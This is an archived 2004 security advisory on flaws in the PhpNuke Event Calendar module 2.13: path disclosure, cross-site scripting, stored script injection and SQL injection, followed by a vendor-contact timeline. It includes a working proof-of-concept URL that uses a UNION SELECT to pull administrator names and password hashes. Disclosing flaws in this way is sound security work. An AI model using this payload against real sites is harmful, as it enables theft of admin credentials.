<<< Date Index >>>     <<< Thread Index >>>

[waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar module for PhpNuke]






{================================================================================}
{                              [waraxe-2004-SA#038]                             
 }
{================================================================================}
{                                                                               
 }
{         [ Multiple vulnerabilities in Event Calendar module for PhpNuke ]     
 }
{                                                                               
 }
{================================================================================}
                                                                                
                                                
Author: Janek Vind "waraxe"
Date: 17. November 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=38


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004
Module's Description: Provides an event calendar for PHP-Nuke communities.
License: GNU/GPL
Author's Name: Original author - Rob Sutton. Development continued by 
Holbrookau.
Author's Email: phpnuke@xxxxxxxxxxxxxx

Event Calendar - a module for PHP-Nuke.
Based on version 1.5 by Rob Sutton, the Event Calendar found here is much 
updated
and features many improvments and add-ons. For example, the administration area 
features
configuration via a graphical interface, posting of events can be moderated and 
users even
have the option of adding comments to any event.

Homepage: http://phpnuke.holbrookau.net/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This piece of sowtware has many security related flaws due to poor 
user-submitted data
handling. 


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "config.php":

http://localhost/nuke73/modules/Calendar/config.php

Warning: main(modules/Calendar/configset.php): failed to open stream: No such 
file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on 
line 11
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion 
(include_path='.;c:\php4\pear') in 
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(mainfile.php): failed to open stream: No such file or directory 
in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(): Failed opening 'mainfile.php' for inclusion 
(include_path='.;c:\php4\pear') in 
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(modules//language/lang-english.php): failed to open stream: No 
such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php 
on line 19
Warning: main(): Failed opening 'modules//language/lang-english.php' for 
inclusion (include_path='.;c:\php4\pear') in 
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19


A2, A3 - full path disclosure in "index.php" and "submit.php":

http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php


B - XSS aka cross site scripting:

Examples:

http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code 
here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss
 code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss
 code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss
 code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss
 code here]


C - script injection in calendar event comments:

It's serious bug - anyone can insert javascript exploit code to event comments
and if user or admin will read it, javascript will trigger and bad things can
happen - like cookie theft, arbitrary admin operations, etc.


D - critical sql injection bugs in code:

If we take a deep look at source code, then there can be found multiple sql 
queries,
where some variables, mostly "$eid" and "$cid" ARE NOT surrounded with single 
quotes.
Therefore sql injection is possible. Further exploitation will depend on 
database 
software and version. In case of the mysql version 4.x with UNION functionality 
enabled,
arbitrary data can be retrieved from database, inluding admin(s) authentication 
credentials.
As tradition, there is proof of concept:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT
%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1

----------------[/real life exploit ]---------------


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08. September 2004

Since then no more response from software developer and downloadable version
still unpatched.

For help with patching look @ here - http://www.waraxe.us/forums.html


Additional recources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool - 
http://base64-encoder-online.waraxe.us/base64/base64-encoder.php


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna, icenix, g0df4th3r and slimjim100!
Tervitused - Heintz ja Maku!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@xxxxxxxxx
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------